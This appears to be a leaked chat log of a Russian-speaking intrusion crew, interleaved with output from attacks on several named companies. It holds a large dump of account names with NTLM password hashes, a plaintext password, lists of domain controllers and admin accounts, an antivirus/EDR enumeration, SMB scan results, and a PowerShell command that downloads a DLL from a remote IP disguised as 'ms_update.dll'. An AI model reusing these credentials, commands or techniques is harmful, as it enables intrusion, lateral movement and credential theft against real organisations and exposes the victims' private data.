41815 HealthMailboxbe46ace f24d0fd11133ba419f3412b0231125b6 66048
41816 HealthMailbox7cfcb86 ac317686191b92d18bb9585177af1e5b 66048
40118 HealthMailbox14fab71 fac48a819ca40d5df057502f461b3a16 66048
40117 HealthMailbox961d56f 1bdce6978ba8dd24df8c21e538042827 66048
42248 HealthMailbox1f7e752 84c0fc778e6fea95e21f79a37152cf61 66048
5584 GORSLIGJ 09796d32e7ba938785d71e6f543e46fd 512
39644 HuetsonA b1c904615ed3d598edecd0d6f3475e10 512
40324 HealthMailboxa42003d ee243f0b09909414dd2bba80be84b686 66048
39982 ThomsonB 76f306fcd546012cb798654519aaf3e9 512
40126 SserwanikoK 57a6b5d6dfa08e5e3dff82a214ca8fc2 512
44902 USCHI-WSUS001$ acd76b581e599ede9bad0cc6b6e73c03 4096
7045 MS-0001 ef39c0015ee354b5b67636c658e8a28b 66048
34051 HealthMailbox15bc7cd e9af80413d564e0bb6062202a35c9072 66048
39649 DAG01$ 995427585767416134a361ba306a63e8 4096
44905 HealthMailbox96cc021 34efbf69c9c86f35e02e77c7f03afabb 66048
41894 HealthMailboxc2cd4a1 476d05ff97d8738a665a0916797a424a 66048
39639 HealthMailboxa822644 afcbc2ca52489b726f73785df50f26f5 66048
42409 HealthMailbox6ebe09a 07f243f47724a95a3320c0f4cf56aa35 66048
40139 HealthMailbox7926783 f4cdda7420c58aa0b75a9d2083b0a484 66048
40234 HealthMailbox618dcbc 5410171583139ae3287f17a3a45edf90 66048
40325 HealthMailboxe40c7e7 da00393b4ff4de12b4678539449029c4 66048
41781 BevanA 501e175b0bb89dba5e01c478c481e277 512
40051 Billy.Papadopoulos 9762551ca617249cf7f7b151fd342a 512
42400 TurnerC f996e6668dbeb00a1f9622d3d6149876 512
34896 AppelbaumD c83e75e265032fb43f99843e6b626227 512
39612 HealthMailboxd3dca33 d4312eba19b6d5f5e8a2b53a5b55dfc8 66048
39611 HealthMailbox6b33597 3a45e861286ff0600a6d4d84ea625288 66048
39266 USCHI-EM-LT400$ 433d7649fbd5a0169d3f83445ca4e5c3 4096
34052 HealthMailbox24d4f77 c1a67961a4db8fe38801993a0e01881a 66048
40401 RussinA c9f8b24de6f807cbf46429c448046913 512
20249 RAMIREZJ 389f9e02b67727a4e3741a181a560e1d 512
38684 LT-000051$ a7794bd8b5a22bddf27179e8d9813dfb 4096
42422 USCHI-AC-LT252$ 7d03887e3a0a9be9884f45cfe4bbc491 4096
40573 USCHI-MAXP001$ acb6a35555f2e71bd0aa3ee309f4295c 4096
40365 HealthMailbox129en16 db68078a4a6780856d1d8e4d06719c04 66048
44876 SophosSAUUSCHI-DCaad f63ba16cce649be6c3f9d70ddcfa992e 66048
39640 HealthMailboxf42742b 35897f49c7e88ac5087b8119d3270693 66048
21845 John.Bovee 9837440c2cf9951ed12af03e2ffc0ab8 512
37391 BurtonC 1fa25d3b28486da3db18bfbacc409616 512
40604 ForrestJ a6e2a736f39ba352edbd132386d7a53b 512
37182 WingS d288eb067466eca7e5797f4979e92b72 512
41016 LT-000092$ f3c7b7de54d4df06166efd1171480335 4096
40580 USCHI-SQL001$ c33daa9e3875e77fb9c654da59ed0948 4096
40665 NegahbanC fbf3755577e45d3a1de2c1c6767959d1 512
42402 SsekawuL 091d5599f2e4b4375af803f19c506bd0 512
19631 SVC-SpPCHIDBG001 fcd176b262169fe61fb34e0f4425ffc4 66048
33892 SP2013sqluser 3177e668868ef76442b29aaf53561b33 66048
37043 TB-000007$ 08c0372a7e7ec076f733adebe2f38d68 4096
34932 USCHI-MSE002$ bd001f027a72df3cab97297255d5087c 4096
40359 TaylorD a65f852886e3eb68826754197313fda9 512
40125 TB-000038$ 8c7fa6c32ce893f767f2a8fa69a39386 4128
40122 MurphyB e0a414cc04786d58eaf58c6ed74fc604 512
40128 RudnitskiJ 91ffd74b4e0f4212a6eba37430070938 512
34190 MateiV cdf3d4aac442f87ade370ce9c5ff325f 512
22107 PCHIAPG015$ 17589c99e20ebc1d344d17589b436cf0 4096
42406 USPWP-PS-LT503$ 1521f666ef6608c806cacc116800a3d7 4096
39622 ColonA f1ab4f980ceb2019875e93373b0996bc 512
35903 WieflingD e1419ea551e8a3708489d14a4511d63b 512
2222 HUERTAJZ d004c6e6916e67935322a08645320ae6 512
34306 SherlockK 1a763f0b68a5702a3c5bcaca26d4d895 512
40530 WrayA c08ee1ee43744ed07a8a16a26400dbc2 512
39980 ParkJ 95a6787e8b5361cf649d4ea800fb929a 512
37355 KonopaA 32a99be19146ab21759edd6fb3496868 512
39983 LT-000091$ 50d0ecee397371feae422f9b5ed27ba6 4096
39660 LT-000070$ eea3e82371a26f3416b7814e2b6095f2 4096
42253 Szabolcs.Molnár ec580949a4738989f8b1d223d29b3fa2 512
39923 RogersD b398da8321cae36bdcd2937399671276 512
39698 USCHI-EC-LT470$ 68320b089044d9297cfcf487467ebec5 4096
40975 LT-000084$ dc78f05f536584279466c73ebfaa422f 4096
39825 QuiambaoJ 385a6b46c236b32277aac9a1b65ad46a 512
37762 LT-000057$ 9063b52224344b9b578eed03153bbcbe 4096
41002 MarksA 2eb540fbf905cd5dc5d51a3bdeed6f62 512
39829 USCHA-EX-LT003$ 90fdbf2d5110b4dfd51c02ae3c2b6eb6 4096
39946 FootR f8c1f58af5e91cc2f0529f5eb82de450 512
20225 PCHIFSP001$ cc5507b84e84deb6c4a594200e02b453 4096
40606 USCHI-HR-LT201$ b8f81f253bd9a38791a89e8cdce8c609 4096
20256 PCHIWSG006$ 21a0e48e5338f95795af1afe069966e3 4096
40582 DT-000036$ 864006ec5328189e74f48de7bf4bdab0 4096
44826 KaneshigeD 23eccd83d894d1d44309c81e0bdb5d78 512
40905 LT-000088$ a0ca0a90791ea3a317b0bf6ff2c63f9e 4096
33804 PCHIVHH001$ 841259e5f2dcb6b3d27b42e692364ba1 4096
39583 Matt.McElmury c8ba14ce62bbfd594eefee5402bd886c 512
40980 TB-000033$ b83774d3b8f669d9b4ae63912fa73695 4096
41142 USCHI-HD001$ 8903816400520bd9b1d56cfbbaa5d0b5 4096
42408 HealthMailbox5a2423e 9a4b225be127f8c87428e3701cb8558e 66048
39272 UrbanekA f41fb620152e62b56a7c45b2ba4a6d59 512
44226 JonesW 37fb9115ff650b92f6517c9bd20059fe 512
20059 SAVUpdate 2ae79b975505ac6638f5416ddbf730c7 66048
34851 38thSouth.Chicago 3571ba6026a4d905f3e866c94f7a4eb5 66048
40635 USCHI-NET005$ a9254ce69c0b179828a854925619985f 4096
39653 SharpJ b9fa6a9dbacc0c8e1366063b72cd76e1 512
40969 PatelS 2c1a5fdcbca3897cbc2b102104997f7e 512
41008 TomnoR 0c8a1e466b279b332410246672a4eae5 512
39700 USCHI-LT002$ 22a67d575506178d29a081d8a3233a15 4096
40657 NyukuriW 6191d425ef9ee2165354a4419991ebb5 512
19586 SpSvcApps_pchiwsg001 7bf03ed2c6b7e7b9b552f82acc63651a 66048
40983 DT-000037$ 6e86dd29cf9202ca5e9f5584874980cb 4096
34839 USCHI-NET002$ 0b7e455fd4b23550844eab83dc423c8a 4096
40131 Jackson.Classes 1520ea113b8671fcbc72464e38e97931 512
40737 USCHI-SBS001$ f566c38ec892e0a28d68a3b77e74dbc5 4096
22147 Joyce.Hess 9744fc04d59464a9101c3dac1917934e 512
40054 Karla.Vazquez 9d3e84fbf49431a251a1515d3f4f1f8e 512
44865 NunezD d4fba61be46a8ebb3aeeedee0a4038bf 512
40576 USCHI-CAS001$ 69c140d5d8a9ad4e3d6d7fe099e7f9ef 4096
40342 Pat.Green 2ebe1d394c3c5711ea76236b0173b778 512
36223 Vesna.Radisic fb5e3c00e06bfb6847bae11d7e6e1994 512
42290 AndersonC ebef1aaff78ac76c35e44bfce75982bd 512
40123 TB-000036$ 312b5c52e8954f12eff556e402cbafda 4096
37384 MenziesR 3367dadb1ed47da301d1bc4331ad7f0d 512
40138 HealthMailbox7dffa84 0e44804bc042abbd733cae446c155a4c 66048
40603 USCHI-PWW001$ 6c3e9d3db5269a69f5aff34f18d0aae9 4096
37203 MiuraK 21ac27c0868ccf48114b987b5da003a9 512
44882 KabagambeJ e3e7b0543be88244044aa0419627fced 512
40648 PulikkaparambilB 427515f386d3e50451a4176383f8d455 512
44885 SteedR 363c87306faacef08d7faa569532f7e6 512
40376 HealthMailboxe791b9d 0c434c5afffa78d4a9a0be9f25038417 66048
40366 HealthMailbox85c3001 eb240d279f937b933ebdf29099401261 66048
40058 KloackT 1ed48e1bc5774560fb655885c5ed6ea8 512
4197 SLADMIN bfe403f6a8d8c12ab1eef72e8a6585be 66048
40736 RichP 2d9d033dcc5dfb33cc9cb7e8294bccf4 512
21904 sh-0004$ 84c576b6197d597efded2247bf54879f 83955712
40651 ValdezB 7bd8b75261ae347d554d6a66cf500b27 512
33886 SP2013serviceapps 16767f231fb7aa2531053a5b53573e98 66048
33813 PCHIAPG014$ b82a6e38d98eb8a0ed50e33e548934f0 4096
33828 SAVDBAdm 5fd68e13747bddbbfdf54ac1869d70e9 66048
41230 USCHA-PWW001$ 860b0d360b082b341800e82fb7f74ed3 4096
39292 USCHI-BKP001$ b3a54016b633555cb2c45bd260e2cb4f 4096
41730 USCHI-DCG002$ 89be79d014709894e3a4ecfb13364787 4096
40002 USCHI-DCG001$ 7f9e33242c3bdacf3167e1e5037da588 532480
39924 USCHI-SPS001$ 4b213eda5ecfad068bc257013fb5e20f 4096
40364 HealthMailbox46fdce2 6163918f7434b212ceb6c092243e862a 66048
13839 LACROSBR 2b576acbe6bcfda7294d6bd18041b8fe 512
44866 USCHI-MSE004$ 419f9d0b43ddf54afc055bea19761b46 4096
43229 SophosSAUUSCHI-DCaab 6177d025c2ae61fcb8c8cee4b77a30a8 66048
41215 USCHI-MSE003$ 050ace4d718c94d3ae26efcfe83a6fc6 4096
44880 FerminE 97053671b85e4329d934da1c808a601d 512
37845 USCHI-DCP001$ ec0dd0e7ccc1b987321d578bfcf7ecaa 532480
13495 TAGGESE 96a2ae3ca2484d6c962751f8773a5fdd 512
34077 HealthMailbox3bc09a0 bdf99b080aedbf7d6668d1e818b1a07b 66048
21796 PCHIDCG004$ 0674f6b7d36bae96c95483ab08b81fb6 532480
39642 HealthMailboxca7c70d 419cf8b0a574b08b2c8f69eb4c214255 66048
40134 SVC-Veeam dde65a21db3af8f11019185a813a081f 66048
39833 USCHI-PSC001$ f3ecc65e9b71f5e24c9979eb29285a53 4096
38641 LT-000048$ 7d2387aeb1136ca43cd75de4b92a1636 4096
20740 USCHI-DT005$ bcacaaf0b5f3a0b54d1a972d92fc8e3b 4096
40666 SVC-NWA001 7aa985a0598066c03db3abe4094f6d10 66048
44881 BibbsS c5cff0d8f6a568d70bc9a5148977672d 512
34107 PhillipsM 8142ab27b7f2a038a7aeebf9ee617a15 512
41864 HinckleyA 68ca58d996aba1f5878a972c610a3d 512
39641 HealthMailbox1e77af7 7915f3f20388ab15624b0f4b1b2abb 66048
44859 EvansM 2f2a0f15cddcb538a13481d04e2137d0 512
44782 PrietoE 20f841336733db221932aca9bb92bc72 512
1983 SAMISJA fba2962905225eee1984a160cdcd0bd6 512
39836 TB-000019$ 7359d7b0cf57fec0a98efc6346fd8b63 4096
39638 HealthMailbox1aff693 bb4bd23653d2025bcb529892e647188b 66048
13266 MITORATJ 877d04d5fcd2277388e50745c79d66e9 512
44764 KeaneM 10596d2a5b807b566d13bfba12e4bda8 512
40358 USCHI-MSE001$ 684abc6d405470366aed0a5efd16ee32 4096
41003 MeyyappanS 2d1c67f526d438a03e14b4de962846eb 512
39289 McNabbL 92c2c9b5bdd41b535414498a9a967683 512
37571 RogersonA 1169d1f3053125533b3e3bb07fa885cb 512
22729 DT-000025$ 727aa92479668cf26a03d878fe81c4b1 4096
41747 KoduriS c283a8cc8f5d9727750a83bdffd525f3 512
41856 Søren.Nielsen 50f4eada5e0effbb0a6a6077548beb11 512
34073 HealthMailbox4d92850 24cd092214357c799bacaa08457ee1a3 66048
40653 SPS-DB-2019 02a31562bc3b3aac1cc3608c28c62350 66048
44901 MylesJ 3febbce1eb70eee2e24430f2be789e5a 512
40525 LT-000078$ beb480edaa18ca91debe43e5be2838d2 4096
13744 SQL0005$ 2d8063e015b796480bc8bdfe35a201a3 4096
44828 CapraM 47bbd4f50abed656114d7ae74a4fedc9 512
40371 HealthMailboxed9d8d9 9429736b4a0b62d8728312c2830fce43 66048
44907 GregoryR 772be1beef56ed673ef0f01c5fe79258 512
37390 DanielsK b716f104b4773a1539d2fd4d15359564 512
34034 USCHA-VHH001$ c7d58e07ec5f97291189c48e1a28516e 4096
39831 LT-000079$ b3eaa1b642d5363f8e24f7370dbe99dc 4096
38517 AltrecheJ 829ad4cb3fa507ddf6c43399444987ba 514
40471 RileyD be8f810d3a4602298f5713d9e7e07c1c 512
40112 SophosSAUPCHIDCG0aaa 770c6f7256a41290fb59124cbde25309 66048
39701 USCHI-LT003$ 96f1875dfa96ac2f4390489a8946f5ac 4096
34813 SCOMreporting 2b4ed2bfde9efc81a41a85d1d5206fd4 66048
20759 PCHIAPG011$ 185ae7cf060d09f8292e92d07f8d3b2e 4096
41939 Jessica.Dineen 64bfd4fa6d778d096cf5eae8e9282f82 512
40377 HealthMailbox2b23d1e c02fa50ec46d90b2885626b738f6d2f1 66048
41774 SophosSAUUSCHI-DCaaa 41e9b05f5eba91dd26c16f8922fd7107 66048
20073 SAVDeploy 6ac770270567476621b6e4226e1b1619 66048
41833 FukamiY 092a4ec16a506dab687cd27e7335ce7a 512
41772 BicheteroE a68984c3cc52681084fde11def4e6966 512
40655 SPS19-Admin 7cae723808d12238a6d0aa770aa52edc 66048
44883 KokkulaS 70e2518735a9b9df1c6fe0e22cbba18a 512
39856 LovayM 8f21392eb6fb500710b40af8a83f5fdf 512
40375 HealthMailbox75828a5 14fb0f6968ae8000f7fddf4c4a1f5fbd 66048
33880 USCHI-APG003$ 91b3b29dc656eb02af1ee8724ae8516f 4096
40526 NgoB de77fb80297f0d8ee2bcb99c3d0961aa 512
40979 JahromiN 09bb23fdfd6a8a5088d4b00b158519 512
38320 ZiolkowskiE 01fa0546c5e947936d58858b8dd6bf07 512
39968 SalgadoM 2284fd51c15b03df26481f4aa7726343 512
1832 DILBERT e1512765af2d617b540f2999cd7afa2a 66048
41738 BhongleH dbd07c1ef0981122c1cd9788426544a8 512
33884 SP2013farm 2f519bb54ffe29f9357fb0cc254fe38e 66048
19573 PCHIDCG002$ 8d94d2d5e9a1fc805d674f10d3b53373 83890176
41938 HawthorneD d47c32e32ae363e9020a81251e4c7921 512
34828 USCHI-APG004$ 031d29fbfd0f65939f073f28d6183a11 4096
22114 AdamsK 6296d23a25e9c800cd9431bdd2cd0c8b 512
39650 HealthMailbox7fb5d79 e6e982558e944abe9f51bf87ca85cdef 66048
20257 PCHIWSG007$ 49f5bae02ea59d68412d6115a9f9b495 4096
44792 NickelM 35f4889cc82f619ad4638a9988c233fa 512
21809 WilkeC 045c26734b9a005cf17f6a48dd1bdd4f 512
41139 Simon.Inocencio 39ab73ea993df91d65361760b15acb3c 512
41090 MackenzieK ee96c882ab32624a08188d7111f92267 512
41226 USCHA-PRT001$ c16ab8e9a41be31efae55df824f73708 4096
44727 Bodjolle-KapsaE ef1b5daf2f4b1bf73413d5e3c51ab869 512
20086 PCHIDBG002$ b081869968ff5d060a79f579f713a3e8 4096
37381 MathisJ 0e817d0a116910563855e2da902b82b2 512
41231 USCHA-DT-CR001$ eff53ed4c77bd7ffb38c74357497c749 4096
37159 Ray.Buhay 6e323a577da3920fb3c2887bc7c8f168 512
20758 PCHIDCG003$ 14f854007faf8024d323f76e2f0b49e4 532480
40378 HealthMailboxf2d3ff4 c972570018e0cb375823ab568f579740 66048
37376 USCHI-EX-LT002$ d8a6a8673e6a15981904a1ce1de7e8e0 4096
40660 DecheR 77322482be2e94d9874fd64d82152791 512
39941 BreenK 1665591f8df783b9475da7f2884994 512
21893 Young.Park a659b5d96eebff7c685cb86eba16ce13 512
40691 SVC-PWORCHFWK c1170d8f273a1f960198107aea89c24d 66048
33889 SP2013superuser dc943a63d9e224c4c1eecb60b0ea7121 66048
41807 CarinoB 11a0dfce42b63f0ba9df53a0f5026fef 512
40061 JPTKO-AR-LT310$ 0310b3c240b6127b3df221ef82438ce7 4096
40124 TB-000037$ bb360076d0af24e55c21a77912b308ee 4128
41014 McPhersonE 31d65df69b4ab96c5ff55f708b912779 512
39818 MadeleyS 307bb063c7dcb33e53b5d8ba529d7a4f 512
39873 USCHA-AD-TB261$ 5ab8e2b6e666d743727d98d75023a256 4096
42401 SotoC 32cb854c0132b64c69a89d729641f153 512
42258 TurnerM 212c2d842a78d9a10c33e85b5ad0e11a 512
42272 WagonerJ fc2970fc5a43549fe9ec50d026a86db1 512
39584 Christy.Henrichs 59477c4c32a6c8d613bea847f9a64015 512
37722 WheelerE 336c8fe2fc69a9c4683a7a91f3a32011 512
44862 4thMain.Chantilly 3ab8d132f8151f6e5e32d3ba00ceb903 66050
40734 MouzannarC 46749b07379289de468f568085d6c725 512
41007 OkukuP c0d0fff534b2ccf66f0570a3a0c5a3af 512
37774 RobertsL a39da193c6b7e3f860e941a50215ae76 512
44884 LT-000114$ 0940be018d064238de3ea4a03a069568 4096
40797 USCHI-PWA001$ a2408e0599790f88aa63ab3eab229116 4096
34920 LT-000061$ b7af82224efada47366a3790fd50904c 4096
39965 CookD 2a43d97f788955bac9d882dc0fb3dbfa 512
40733 USCHI-MAXD001$ cdc6a1af54ee65e0333204d3fbb1a198 4096
22783 RIEHLEBN 5b7b730c9fd6deecdcd148a9bff5133a 512
37723 KondoE 3bc541064d8ec3ed649691968690a264 512
42423 Hector.Lassalle 431974f5bf9c35f3a10a29109e19724c 512
34167 DeScipioB f95502d80b9ea878f0018c7b0c6f87c8 512
33966 DadzieH 6d9290e770d5bf1ff6836840b7b59f84 512
40323 RutledgeJ 5e56216cb25e0e8e2a542ca39360751f 512
40078 KennedyM b2ed696d60faf2d7ab36ad803380bc5c 512
44793 OtisC a7057b710c850a2583d91e6ab6515762 512
39920 USCHI-PWD001$ 36a1eaedea094edab12b84cfa98b0c50 4096
40077 USCHI-AR-LT304$ 3c8fab905433bdba5ba414918817bda1 4096
40703 OShaughnessyJ fc3f57382132cc724d0c1a247deedd21 512
34923 USCHI-PRT001$ 8fb45d6305cedd6aceca53ede74483d8 4096
33901 USCHI-NET001$ 3e3f3c8ed0f7f043dda23abb1c28cc21 4096
41735 SVC-ADFS$ d6e4acd9308e2f5a6292157d86da9c92 4096
39950 USCHI-EC-LT471$ ee0936fb5f7a8e0ef8eba480c7f54cd6 4096
41937 McBrideM cc9d0dbf4258fdc1e55ff26ad2ee2932 512
40600 McGuireJ 1d11ae313783e45c5394d08781604544 512
41018 YadavV 7491dd8b724426c29f27f366fb6ecca6 512
42291 HenryE a440a912fc6ecb526b5760775fba853e 512
39830 MitchellP 88936881f2f85b62e0083c12ee565172 512
34118 LT-000072$ 636bbb93ced29a73ddaee259a5ba06c8 4096
22075 PCHIAPG016$ 18202163319af72e40cf316542584fe0 4096
44900 RichardsonT a544ba6f928c87cb61e97c380d9e241f 512
16992 SQL-RPTSPS01 383b1ddb10bb01e5ffb7b163dc095418 66048
36401 RayC 4f6b6dce47b14e9d1898763c96ce962d 512
40031 DovinosE 2d05292f9228f8bd91837fc787c79f5c 512
34850 38thNorth.Chicago 3571ba6026a4d905f3e866c94f7a4eb5 66048
44766 LT-000094$ 6ff7a1a8950aedd6cb9ccf13ef1859a3 4128
40578 LT-000082$ 8eef661c8cdf5e4b46384cc2014583ff 4096
44795 USCHA-AR-LT302$ c0e8c00b7a1ee4bde23d1e189bef3567 4096
37404 SmithR c7d64ed4e0fbd04c58f4644c80dd8c02 514
39479 PahutskiN 38512ad3100ab037926f0f0a5b70f389 512
40120 SammarcoS c92a5c63cae2e7428495d8b77fc97e92 512
42255 KroenungJ 9c290f9f7183278c8827c34a218ee0dd 512
44745 WuJ aeded1ca393ba33656f9efb397c7d731 512
39871 ParedesC 24d5dbf209b2dcf8f60546c3231765b7 512
34035 USCHI-TB001$ f594e97a770996e3ec9514dca67363db 4096
34015 BratekC 96d4f40946ad8b0b928598e73031035a 512
42274 LT-000116$ 1f070a8d2f1056c2b177f97980fae907 4096
41741 SebastianD 45eed92671229eefc97251761581d3b9 512
39949 LT-000089$ d04aadc6108129c812050798f974c4a1 4096
44864 LT-000106$ 5680be9406feb8775eb1c65b1f42c41e 4096
40243 LT-000068$ 7e44c433fca95f7eead0f2058e1fc0a3 4096
20232 PCHIWSG005$ ee7f254869179c7632bc7e40f8349905 4096
22750 BoyceJ a481368014afcd2a9ac6ccf629dd54e5 512
39837 TB-000018$ 2d5fad9ae1924e8adcccaa774ab12e09 4096
40466 LT-000074$ 776b0637557c0ac21387a73f1c615f82 4096
39998 LT-000085$ 5be140a216e0011c33ffe17314d57e5b 4096
2019 ZINNIPJ 600b76d06fdc806b243152e2d96cee45 512
41729 USCHI-SBS003$ 82f1bad43965f98bd878ce977afde47b 4096
40668 TB-000030$ 7855accb72823ebfcc9cf005b646c1e4 4096
34785 InfoSecJournal 68ffcc0181a44868b8db2d1937e9b259 512
40032 USCHI-DCG003$ d8af49fad0a9d90c7a8de32ad6e4272c 532480
41737 USCHI-AI-LT321$ a672928458f8afdf59864e49a54e10ca 4096
39652 LaiP 4bc27b001dea96386b673c6d59ee25b6 512
41146 USCHA-AD-LT265$ 183664d73040e5be79033c2712c74c17 4096
40581 USCHI-EE-LT424$ 264e736f50b910d9e1ba6de10bfbe827 4096
41147 LT-000108$ 81bbc0c79572ce1a4f04504119316b74 4096
41812 HealthMailboxfe74d85 c7b6dc2062284275f0f821a9723a5ec3 66048
37736 LT-000038$ 328512fed883d24da5ec344057e4422b 4096
40400 USCHI-NWA001$ ff3efe403ab4bde2c8eb59e503c17e54 4096
501 Guest 1ac40696bc0a5b0148da4ceffecc97df 514
``20 минчуть позже скажудо 2х работаем?я выдам 2 длл2 сервера в глуши ищемкрасавчики)Слава великим войнам)`HOBBES\RAMIREZJ 389f9e02b67727a4e3741a181a560e1d`user3``
Domain Controllers:
 Server Name IP Address
 ----------- ----------
 PCHIDCG003 10.20.32.100
 PCHIDCG004 10.20.32.28
 USCHI-DCP001 10.20.32.175
 USCHA-DCG002 10.6.0.56
 USCHI-DCG003 10.20.32.103
 USCHI-DCG001 10.20.32.101
 PCHIDCG002 10.111.2.20
``````
Alias name Administrators
Comment

Members

-------------------------------------------------------------------------------
Administrator
HOBBES\AdamsK
HOBBES\Domain Admins
HOBBES\SUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN
``````
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
DILBERT MS-0001 RAMIREZJ
SPS19-Admin SPS-DB-2019 SPS-TS-2019
SVC-NWA001
``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
DILBERT ePOScan Exchange Service
LaiP MITORATJ MS-0001
PCHIAPG009 PCHIAPG014 PCHIDBG001
RAMIREZJ SAVDeploy SCCMadmin
SCOMaction SLADMIN SPS19-Admin
SPS-DB-2019 SPS-TS-2019 SQL0005
SVC-CAS SVC-ESRI SVC-NWA001
SVC-PW-DBG001 SVC-PWORCHFWK SVC-PW-ORCHFWK
SVC-PWPWD001 SVC-Veeam TAGGESE
TENGSERV UREJA USCHIPWA001
USCHIPWD001 USCHIPWW001
```сюда сообщения продублируйтеберидаже 2в кобе есть сессия?кобахотя нетзайди в тпшждидаlfесть там еще че?грустноушел в оффсейчас посмотрюсесия сдохлада и вебрут вроде тоже..сентинел нам не помеха) проверено)работаемнуусентинел))EDR
```
====== AntiVirus ======

  Engine: Sentinel Agent
  ProductEXE : C:\Program Files\SentinelOne\Sentinel Agent 4.2.4.154\SentinelRemediation.exe
  ReportingEXE : C:\Program Files\SentinelOne\Sentinel Agent 4.2.4.154\SentinelAgent.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine: Webroot SecureAnywhere
  ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe
  ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe
``ДК
` THFDC01 10.254.191.10`ЛА
```
Admin
Administrator
CDKLocalAdm
TOMHOLZERFORD\Domain Admins
The command completed successfully.

```ЕА
```
Administrator CDKAdmin CDKPCADMIN
ProfWiz THFAdmin
``ДА
```
Administrator CDKAdmin CDKPCADMIN
ProfWiz THFAdmin
```но ни системы, ни ЛА пока нетнет, на пару вдсок залезлинашли ДА?```
(New-Object System.Net.WebClient).DownloadFile('http://104.243.44.69:8080/Um8r3114/x64.dll', 'C:\Windows\Temp\ms_update.dll')
```J$13Yr18``
>sAMAccountName: flshc
>description: Generic Login ID for Fletcher Shipping Clerks (2 COMPUTERS). Generic Novell Password=flshc09 (zero,nine)
``````
[+] 170.7.180.21:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78229W7E64) (domain:WILSONART)
[170.7.12.16:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:73183W7P) (domain:WILSONART)
[170.7.180.26:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78209W7E64) (domain:WILSONART)
[+] 170.7.180.83:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78211W7E64) (domain:WILSONART)
[+] 170.7.54.81:445 - Host is running Windows XP SP3 (language:English) (name:FAMIXXP) (domain:WILSONART)
[+] 170.7.76.113:445 - Host is running Windows XP SP3 (language:English) (name:VYOMLABS1) (domain:WILSONART)
[+] 170.7.123.169:445 - Host is running Windows XP SP3 (language:English) (name:73324XP) (domain:WILSONART)
[+] 170.7.160.14:445 - Host is running Windows XP SP3 (language:English) (name:71919XP) (domain:WILSONART)
[+] 170.7.76.11:445 - Host is running Windows XP SP3 (language:English) (name:ORACLEXP1) (domain:WILSONART)
[170.7.12.114:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:74023W7P) (domain:WILSONART)
[+] 170.7.54.63:445 - Host is running Windows XP SP3 (language:English) (name:ORACLEXP2) (domain:WILSONART)
[+] 170.7.76.114:445 - Host is running Windows XP SP3 (language:English) (name:VYOMLABS2) (domain:WILSONART)
[170.7.8.19:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:74858W7P) (domain:WILSONART)
[+] 170.7.120.13:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77857W7P) (domain:WILSONART)
[+] 170.7.54.72:445 - Host is running Windows XP SP3 (language:English) (name:XPTEST1) (domain:WILSONART)
[+] 170.7.12.205:445 - Host is running Windows XP SP3 (language:English) (name:76216XP) (domain:WILSONART)
[+] 170.7.170.194:445 - Host is running Windows XP SP3 (language:English) (name:73347XP) (domain:WILSONART)
[+] 170.7.120.93:445 - Host is running Windows XP SP3 (language:English) (name:73657XP) (domain:WILSONART)
[+] 170.7.5.252:445 - Host is running Windows XP SP3 (language:English) (name:EDIWS02) (domain:WILSONART)
[+] 170.7.171.225:445 - Host is running Windows XP SP3 (language:English) (name:73682XP) (domain:WILSONART)
[+] 170.7.5.251:445 - Host is running Windows XP SP3 (language:English) (name:EDIWS01) (domain:WILSONART)
[+] 170.7.121.51:445 - Host is running Windows XP SP3 (language:English) (name:73206XP) (domain:WILSONART)
[+] 170.7.160.78:445 - Host is running Windows XP SP3 (language:English) (name:73844XP) (domain:WILSONART)
[+] 170.7.121.18:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77212W7P) (domain:WILSONART)
[170.7.120.165:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:78066W7P) (domain:WILSONART)
[+] 170.7.12.33:445 - Host is running Windows XP SP3 (language:English) (name:72697XP) (domain:WILSONART)
[+] 170.7.159.17:445 - Host is running Windows XP SP3 (language:English) (name:73935XP) (domain:WILSONART)
[+] 170.7.181.242:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77217W7P) (domain:WILSONART)
[+] 170.7.180.40:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77374W7P) (domain:WILSONART)
[+] 170.7.12.205:445 - Host is running Windows XP SP3 (language:English) (name:76216XP) (domain:WILSONART)
[170.7.180.18:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77850W7P) (domain:WILSONART)
[+] 170.7.122.115:445 - Host is running Windows XP SP3 (language:English) (name:76291XP) (domain:WILSONART)
[+] 170.7.180.82:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78208W7E64) (domain:WILSONART)
[+] 170.7.182.47:445 - Host is running Windows XP SP3 (language:English) (name:73938XP) (domain:WILSONART)
```.```
>sAMAccountName: Administrator
>sAMAccountName: kronosadmin
>sAMAccountName: cognosadmin
>sAMAccountName: ediadmin
>sAMAccountName: polyreyadmin
>sAMAccountName: itco365admin
>sAMAccountName: itco365admin2
>sAMAccountName: hfmadmin
>sAMAccountName: dcdevdb2admin
>sAMAccountName: gcdadmin
>sAMAccountName: p8admin
>sAMAccountName: dcadmin
>sAMAccountName: dcqadb2admin
>sAMAccountName: dcproddb2admin
>sAMAccountName: p8prodadmin
>sAMAccountName: dcprodadmin
>sAMAccountName: dsiadmin
>sAMAccountName: dsiadmin1
>sAMAccountName: dsiadmin2
>sAMAccountName: waitadmin
>sAMAccountName: admindsi


``ну значит выбраться надо только в карантиныгде-то не пингуется дажегде-то снялк этим я обращалсяcn.Wilsonart.com
ralphwilcon.com
uk.Wilsonart.com
polyrey.com
resopal.ger
arborite.com
eu.Wilsonart.comкак к разным?ну ты прямо так к ним обращался?ну, получается они снятыага, вижуэто какая-то кривотень, да, но это разные домены с одним названием``
